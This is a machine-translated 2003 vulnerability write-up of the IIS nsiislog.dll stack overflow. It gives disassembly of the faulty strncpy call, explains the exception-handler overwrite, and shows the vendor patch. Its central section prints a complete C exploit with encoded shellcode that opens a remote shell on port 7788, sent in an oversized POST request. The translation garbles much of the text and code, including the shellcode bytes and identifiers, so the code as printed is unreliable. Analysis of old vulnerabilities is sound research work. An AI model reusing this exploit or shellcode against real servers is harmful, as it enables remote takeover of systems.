[Practical] Analysis of IISLOG.DLL Overflow

xiaoxiao2021-03-06 23

Analysis of IIS's nsiislog.dll overflow problem

Created: 2003-07-02 Updated: 2003-07-02

Article attribute: original

Article submission:

Flashsky (Flashsky1_at_sina.com)

Pick, please indicate the author and security focus

Author: FLASHSKY

Site:

Www.xfocus.net,

Www.shopsky.com

Email: Flashsky@xfocus.org

Author: Qi Mingxing Active Defense Laboratory

Pointed, write some garbage articles to earn some points, don't take me with eggs.

Cause Analysis of overflow vulnerabilities:

The code that causes the overflow is in nsiislog.dll, as follows

.Text: 40f01b08 MOV ECX, ESI

.text: 40f01b0a call dword PTR [EAX 8]

.text: 40f01b0d push eax <-------------- Calculated POST data length

.TEXT: 40F01B0E MOV ECX, EBX

.TEXT: 40F01B10 Push [EBP ARG_4] <---------------- POST data BUFFER

.TEXT: 40F01B13 CALL SUB_40F01EEE

######################################################################################################################################################################################################################################################################################################## ######################################################################################################################################################################################################################################################################################################## #####

SUB_40F01EEE function content:

.Text: 40f01eee push ebp

.TEXT: 40F01EEF MOV EBP, ESP

.TEXT: 40F01EF1 MOV EAX, 1104H

.TEXT: 40F01EF6 CALL SUB_40F02B80 <---------------- allocated buffer, pressing the ESP-0x1104

.Text: 40f01efb push ebx

.Text: 40f01efc push ESI

.text: 40f01efd MOV EBX, [EBP ARG_4]

.Text: 40f01f00 push eDi <----------------- leads to the parameters of the overflow, it should be the length of the spilled buffer

.Text: 40F01F01 MOV EDI, [EBP ARG_8] Here, it is transmitted to the length of POST data.

.TEXT: 40F01F04 or ECX, 0FFFFFFFH

.text: 40f01f07 xor Eax, EAX

.TEXT: 40F01F09 Push EBX

.TEXT: 40F011F0A Repne Scasb

.text: 40f01f0c push [EBP ARG_0] <--------------------- Our POST data .Text: 40f01f0f lea eax, [EBP VAR_1104]

.TEXT: 40F01F15 Not ECX

.TEXT: 40F01F17 DEC ECX

.text: 40f01f18 push eax <---------------------- The overflowed buffer

.TEXT: 40F01F19 MOV [EBP VAR_4], ECX

.TEXT: 40F01F1C Call DS: STRNCPY <--------------------- Leading the invoice

Spill reasons:

Strncpy This call was originally a security function called, the original shape:

STRNCPY (BUF1, BUF2, BUF1MAXLEN)

However, in this call, the caller misunderstand the call of this function as follows:

STRNCPY (BUF1, BUF2, BUF2MAXLEN), so that the third parameter should be buff1maxlen to limit the invoice that can cause overflows into use.

We can calculate the overlay point of the return address is:

0x1104 4 (EBP occupied address) = 0x1108, then 0x110c byte, pay attention to the POST data does not exist 0x0 in the overlay, otherwise StrNCPY will automatically add data with 0.

Overflow attack implementation:

However, we have repeatedly raised an exception that will trigger a function (mainly in the back STRSPN call), then we have to override the abnormal structure. (Of course, if you can easily design your own content, you can't lead to an exception, but this is too much trouble), nsiislog.dll does not have an exception handler, then we need to overwrite the default anomaly structure processing address, we can pass Accumulate all the size of all call stacks Calculate the distance from our overflow buffer from this address is 0x2708.

In addition, the problem that needs to be considered is before triggering an exception, if the application will make some problems, then we'd better make the buffer in StrNCPY. (This overflow, the case of some of the data before the EBP will be converted, and it will also truncate the addition of a message. Of course, we can also set the position of the shellcode, but the return address is not a good setting).

Then we need a longer address longer than 0x270C, which is associated with address access violation. This length is related to the current buffer size (to the next address segment, such as 0x8cxxxx-> 0x8D0000):

Consider this problem, our buffer is placed in 0x10000 data (of course, typically 25,000 can lead to an abnormality in Strncpy), and can absolutely guarantee that abnormalities in Strncpy.

Below we will find the address of a Call EBX or JMP EBX (because it is overwriting an abnormal structure), this address is actually a lot in nsiislog.dll, which avoids many version requirements. Here you analyze you why you want to find the principle of Call (JMP) EBX after overflow an abnormal structure.

First, the abnormal structure chain structure is as follows

DWORD PNEXT next anomaly structure address pointer

DWORD FUNADDR Current Handle Inlet Address

The processing in KiuseRexceptionDispatcher is as follows:

77F8E4CA FF7304 PUSH DWORD PTR [EBX 0x4] DS: 0023: 008cf764 = 40F0135C <----------- EBX 4 is the current exception handler call, EBX is an abnormal structure address, due to possible To deal with the next anomalous chain, EBX saves no modifications so that we can control a memory area we can control after we cover the exception handler of EBX 4.

77F8E4CD 8D45F0 Lea Eax, [EBP-0x10]

77F8E4D0 50 Push EAX

77F8E4D1 FF750C Push DWORD PTR [EBP 0xC]

77F8E4D4 53 Push EBX

77F8E4D5 56 Push ESI

77F8E4D6 E83AFFFFF CALL NTDLL! RTLSETBITS 0X305 (77F8E415)

77F8E42F FF7514 Push DWORD PTR [EBP 0x14]

77F8E432 FF7510 PUSH DWORD PTR [EBP 0x10]

77F8E435 FF750C PUSH DWORD PTR [EBP 0xC]

77F8E438 FF7508 PUSH DWORD PTR [EBP 0x8]

77F8E43B 8B4D18 MOV ECX, [EBP 0x18] <------------- Here is the overflowed abnormal structure address

77F8E43E FFD1 Call ECX {nsiislog 0x135c (40F0135C)}

It should be noted here that the found return address is on [EBX 4], and the calling Call EBX also puts the content of this address memory as the instruction, so the content of the EBX (before the abnormal structure) should be skipped

EBX 4 (covered exception structure address), the following is an Express, use ISNO shellcode (I got this shellcode a little shortage, so that only the instructions can only be executed, modified), after execution Telnet IP 7788

#include

Char * Hostname = NULL;

Unsigned char shellcode [] =

"/ X90 / XEB / X03 / X5D / XEB / X05 / XE8 / XF8 / XFF / XFF / XFF / X83 / XC5 / X15 / X90 / X90"

"/ x90 / x8b / x66 / xb9 / x10 / x03 / x50 / x80 / x30 / x97 / x40 / xfa"

"/ X7E / X8E / X95 / X97 / X97 / XCD / X1C / X4D / X14 / X7C / X90 / XFD / X68 / XC4 / XF3 / X36"

"/ x97 / x97 / x97 / x97 / xc7 / xf3 / x1e / xb2 / x97 / x97 / x97 / x97 / xa4 / x4c / x2c / x97"

"/ x97 / x77 / x96 / x97 / x97 / x16 / x6c / x97 / x97 / x68 / x28 / x98 / x14"

"/ x59 / x96 / x97 / x97 / x16 / x96 / x97 / x97 / x96 / x97 / xc1 / x16 / xac / xda / xcd / xe2"

"/ X70 / XA4 / X57 / X1C / XD4 / XAb / X94 / X54 / XF1 / X16 / XAF / XC7 / XD2 / XE2 / X4E / X14"

"/ X57 / XEF / X1C / XA7 / X94 / X64 / X1C / XD9 / X9B / X94 / X5C / X16 / XAE / XDC / XD2 / XC5"

"/ XD9 / XE2 / X52 / X16 / XEE / X93 / XD2 / XDB / XA4 / XA5 / XE2 / X2B / XA4 / X68 / X1C / XD1"

"/ XB7 / X94 / X54 / X1C / X5C / X94 / X9F / X16 / XAE / XD0 / XF2 / XE3 / XC7 / XE2 / X9E / X16"

"/ XEE / X93 / XE5 / XEE / XF4 / XD6 / XE3 / X91 / XD0 / X14 / X57 / X93 / X7C / X72 / X94 / X68"

"/ x94 / x6c / x1c / xc1 / xb3 / x94 / x6d / xa4 / x45 / xf1 / x1c / x80 / x1c / x6d / x1c / xd1"

"/ X87 / XDF / X94 / X6F / XA4 / X5E / X1C / X58 / X94 / X5E / X94 / X5E / X94 / XD9 / X8B / X94"

"/ X5C / X1C / XAE / X94 / X6C / X7E / XFE / X96 / X97 / X97 / XC9 / X10 / X60 / X1C / X40 / XA4"

"/ x57 / x60 / x47 / x1c / x5f / x65 / x38 / x1e / xa5 / x1a / xd5 / x9f / xc5 / xc7 / xc4 / x68"

"/ x85 / xcd / x1a / xd5 / x82 / xc5 / xc1 / x68 / xc5 / x93 / xcd / xa4 / x57"

"/ x3b / x13 / x57 / x5e / x1d / x99 / x13 / x5e / x93 / x9e / xc5 / xc1 / xc4"

"/ x68 / x85 / XCD / X3C / X75 / X7F / XD1 / XC5 / XC1 / X68 / XC5 / X93 / XCD / X1C / X4F / XA4"

"/ X57 / X3B / X13 / X57 / XE2 / X6E / XA4 / X5E / X1D / X99 / X17 / X6E / X95 / XE3 / X9E / XC5"

"/ XC1 / XC4 / X68 / X85 / XCD / X3C / X75 / X70 / XA4 / X57 / XC7 / XD7 / XC7 / XD7 / XC7 / X68" "/ XC0 / X7F / X04 / XFD / X87 / XC1 / XC4 / X68 / XC0 / X7B / XFD / X95 / XC4 / X68 / XC0 / X67 "

"/ XA4 / X57 / XC0 / XC7 / X27 / X9B / X3C / XCF / X3C / XD7 / X3C / XC8 / XDF / XC7 / XC0 / XC1"

"/ X3A / XC1 / X68 / XC0 / X57 / XDF / XC7 / XC0 / X3A / XC1 / X3A / XC1 / X68 / XC0 / X57 / XDF"

"/ X27 / XD3 / X1E / X90 / XC0 / X68 / XC0 / X53 / XA4 / X57 / X1C / XD1 / X63 / X1E / XD0 / XAB"

"/ X1E / XD0 / XD7 / X1C / X91 / X1E / XD0 / XAF / XA4 / X57 / XF1 / X2F / X96 / X96 / X1E / XD0"

"/ XBB / XC0 / XC0 / XA4 / X57 / XC7 / XC7 / XC7 / XD7 / XC7 / XDF / XC7 / XC7 / X3A / XC1 / XA4"

"/ x57 / xc7 / x68 / xc0 / x5f / x68 / xc0 / x5b / x68 / Xe1 / x6b / x68 / xc0"

"/ x5b / xdf / xc7 / xc7 / xc4 / x68 / xc0 / x63 / x1c / x4f / xa4 / x57 / x23 / x93 / xc7 / x56"

"/ X7F / X93 / XC7 / X68 / XC0 / X43 / X1C / X67 / XA4 / X57 / X1C / X5F / X22 / X93 / XC7 / XC7"

"/ XC0 / XC6 / XC1 / X68 / XE0 / X3F / X68 / XC0 / X47 / X14 / XA8 / X96 / XEB / XB5 / XA4 / X57"

"/ XC7 / XC0 / X68 / XA0 / XC1 / X68 / XE0 / X3F / X68 / XC0 / X4B / X9C / X57 / XE3 / XB8 / XA4"

"/ x57 / xc7 / x68 / xa0 / xc1 / xc4 / x68 / xc0 / x6f / xfd / xc7 / x68 / xc0 / x77 / x7c / x5f"

// This has changed the wrong shellcode. The original is / xc0 / x6b / xa4 / x5e / xc6 / xc7,

// reverse the last 2 parameters of WriteFile, causing the write pipe to fail, so that it is not possible to enter the command

// Original: Push EDI (is an address) After modification: xor eCX ECX

// xor ECX ECX PUSH ECX

// push ecx push edi

// Push Eax (received buffer byte) Push eax

// Push ESI (Buffer Pointer) PUSH ESI

// push [EDX-54] Push [EDX-54]

// Call Writefile Call Writefile

// will result in writing pipe failed

"/ XA4 / X57 / XC7 / XC1 / XC4 / X68 / XC0 / X6B / XA4 / X5E / XC6 / XC0 / XC7"

"/ XC1 / X68 / XC0 / X3B / X68 / XC0 / X4F / XFD / XC7 / X7C / X3D / XC7 / X68" "" "/ XC0 / X73 / X7C / X69 / XCF / XC7 / X1E / XD5 / X65 / X54 / X1C / XD3 / XB3 / X9B / X92 / X2F "

"/ x97 / x97 / x97 / x50 / x97 / Xef / xc1 / xa3 / x85 / xa4 / x57 / x54 / x7c / x7b / x7f / x75"

"/ x6a / x68 / x68 / x7f / x05 / xdc / xc1 / x70 / x-x2 / xb4 / x17 / x70 / xe0"

"/ xdb / xf8 / xf6 / xf3 / xdb / xfe / xf5 / xe5 / xf6 / xe5 / XEE / XD6 / X97 / XDC / XD2 / XC5"

"/ XD9 / XD2 / XDB / XA4 / XA5 / X97 / XD4 / XE5 / XF2 / XF6 / XE3 / XF2 / XC7 / XFE / XE7 / XF2"

"/ x97 / xd0 / xf2 / xe3 / xc4 / xe3 / xf6 / xe5 / xe3 / xe2 / xe7 / xde / xf9 / xf1 / xf8 / xd6"

"/ x97 / xd4 / xe5 / xf2 / xc7 / xe5 / xf8 / xf4 / xf2 / xe4 / xe4 / xd6 / x97"

"/ XD4 / XFB / XF8 / XE4 / XF2 / XDF / XF6 / XF9 / XF3 / XFB / XF2 / X97 / XC7 / XF2 / XF2 / XFC"

"/ XD9 / XF6 / XFA / XF2 / XF3 / XC7 / XFE / XE7 / XF2 / X97 / XD0 / XFB / XF8 / XF5 / XF6 / XFB"

"/ XD6 / XFB / XFB / XF8 / XF4 / X97 / XC0 / XE5 / XFE / XE3 / XF2 / XD1 / XFE / XFB / XF2 / X97"

"/ XC5 / XF2 / XF6 / XF3 / XD1 / XFE / XFB / XF2 / X97 / XC4 / XFB / XF2 / XF2 / XE7 / X97 / XD2"

"/ XEF / XFE / XE3 / XC7 / XE5 / XF8 / XF4 / XF2 / XE4 / XE4 / X97 / X97 / XC0 / XC4 / XD8 / XD4"

"/ XDC / XA4 / XA5 / X97 / XE4 / XF8 / XF4 / XFC / XF2 / XE3 / X97 / XF5 / XFE / XF9 / XF3 / X97"

"/ Xfb / XFE / XE4 / XE3 / XF2 / XF9 / X97 / XF6 / XF4 / XF4 / XF2 / XE7 / XE3 / X97 / XE4 / XF2"

"/ XF9 / XF3 / X97 / XE5 / XF2 / XF4 / XE1 / X97 / X95 / X97 / X89 / XFB / X97 / X97 / X97 / X97"

"/ x97 / x97 / x97 / x97 / x97 / x97 / x97 / x97 / xf4 / xfa / xf3 / xb9 / xf2 / XEF / XF2 / X97"

"/ x68 / x68 / x68 / x68";

Void main (int Argc, char ** argv)

{

Wsadata wsadata;

Socket S;

SockAddr_in addr_in;

UNSIGNED Char BUF [1000];

Unsigned char Testbuf [0x10000];

Int Len;

Char t1 [] = "post /scripts/nsiislog.dll http / 1.1 / r / nhost: 192.168.10.210/r/ncontent-lendh: 65536 / r / n / r / n"; // 4364

IF (WsaStartup (MakeWord (2,0), & WSADATA)! = 0)

{

Printf ("WSAStartup Error.Error:% D / N", WsageTlasterror ());

Return;

}

Hostname = argv [1]; addr_in.sin_family = AF_INET;

Addr_in.sin_port = htons (80);

Addr_in.sin_addr.s_un.s_addr = inet_addr (Hostname);

MEMSET (TestBuf, 0,0x10000);

IF ((s = socket, sock_stream, ipproto_tcp) == invalid_socket)

{

Printf ("socket failed.error:% d / n", wsagetlasterror ());

Return;

}

IF (WSaconnect (Struct Sockaddr *) & addr_in, sizeof (addr_in), null, null, null, null) == Socket_ERROR)

{

Printf ("Connect Failed. Error:% D", Wsagetlasterror ());

Return;

}

Len = SizeOf (T1) -1;

Memcpy (TestBuf, T1, LEN);

Send (S, Testbuf, Len, 0);

RECV (S, BUF, 1000, 0);

MEMSET (Testbuf, 'A', 65536); // 4364

LEN = 65536; // 4364;

* (DWORD *) (TESTBUF 0x2704) = 0x04eb06eb; // jmp overlapping exception address

* (DWORD *) (TESTBUF 0x2708) = 0x40f0135c; // override the value of the abnormal structure

Memcpy (TestBuf 0x270c, shellcode, sizeof (shellcode);

Send (S, Testbuf, Len, 0);

CloseSocket (s);

WSACLEANUP ();

Return;

}

Patch mechanism:

WindowsMedia41-KB822343-X86-Chs.exe patch repairs this vulnerability, as follows:

.Text: 40F01FCA MOV EAX, 1100H

.TEXT: 40F01FCF CALL SUB_40F02D30

.TEXT: 40F011FD4 Push EBX

.Text: 40f011fd5 push ESI

.text: 40f011fd6 push edi

.Text: 40F011FD7 MOV EDI, [EBP ARG_8]

.Text: 40f01fda or ECX, 0FFFFFFFFH

.Text: 40f01fdd xor Eax, EAX

.Text: 40f01fdf repne scaSB

.Text: 40F01FE1 MOV ESI, [EBP ARG_4]

.Text: 40F01FE4 MOV EAX, 0FFFH <---------------------- Force EAX = 0xFF (less than the assigned space 0x1100) ;. TEXT: 40F01FE9 NOT ECX

.Text: 40F01FEB DEC ECX

.Text: 40f01fec cmp ESI, EAX <---------------------- Comparison is more than

.Text: 40F01Fee Mov EBX, ECX

.TEXT: 40F01FF0 JBE SHORT LOC_40F01FF4

.text: 40f01ff2 MOV ESI, EAX <-------------------------------------------------------------------------------------------------------------------------------

.TEXT: 40F01FF4

.TEXT: 40F01FF4 LOC_40F01FF4:; Code Xref: SUB_40F01FC7 29J

.Text: 40f01ff4 Push ESI

.Text: 40f01ff5 Lea Eax, [EBP VAR_1100]

.TEXT: 40F01FFB PUSH [EBP ARG_0]

.Text: 40F01ffE Push Eax

.TEXT: 40F01FFF Call DS: STRNCPY

转载请注明原文地址:https://www.9cbs.com/read-40961.html

9cbs

New Post(0)